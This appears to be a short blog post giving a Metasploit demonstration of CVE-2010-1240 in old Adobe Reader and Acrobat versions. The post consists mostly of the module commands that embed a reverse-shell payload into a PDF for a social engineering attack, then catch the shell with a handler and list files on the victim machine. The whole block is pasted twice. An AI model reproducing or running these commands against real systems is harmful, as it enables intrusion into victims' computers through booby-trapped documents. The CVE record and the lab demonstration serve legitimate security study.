Vulnerability discovered & disclosed by Didier Stevens the 2010-03-29
Exploit-DB PoC provided by Didier Stevens the 2010-03-31
PoC provided by:
jduck
Colin Ames
Reference(s) :
CVE-2010-1240
EDB-ID-11987
Affected versions :
Adobe Reader 9.3.2 and earlier versions for Windows, Macintosh, and UNIX
Adobe Acrobat 9.3.2 and earlier versions for Windows and Macintosh
Tested on Windows XP SP3 with Adobe Reader 9.3.0
Description :
This module embeds a Metasploit payload into an existing PDF file. The resulting PDF can be sent to a target as part of a social engineering attack.
Metasploit demo :
use exploit/windows/fileformat/adobe_pdf_embedded_exe
set OUTPUTPATH /home/eromang
set INFILENAME metasploit.pdf
set TARGET 0
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.178.21
exploit
use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.178.21
expoit -j
sessions -i 1
dir
Exploit-DB PoC provided by Didier Stevens the 2010-03-31
PoC provided by:
jduck
Colin Ames
Reference(s) :
CVE-2010-1240
EDB-ID-11987
Affected versions :
Adobe Reader 9.3.2 and earlier versions for Windows, Macintosh, and UNIX
Adobe Acrobat 9.3.2 and earlier versions for Windows and Macintosh
Tested on Windows XP SP3 with Adobe Reader 9.3.0
Description :
This module embeds a Metasploit payload into an existing PDF file. The resulting PDF can be sent to a target as part of a social engineering attack.
Metasploit demo :
use exploit/windows/fileformat/adobe_pdf_embedded_exe
set OUTPUTPATH /home/eromang
set INFILENAME metasploit.pdf
set TARGET 0
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.178.21
exploit
use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.178.21
expoit -j
sessions -i 1
dir
0 comments:
Post a Comment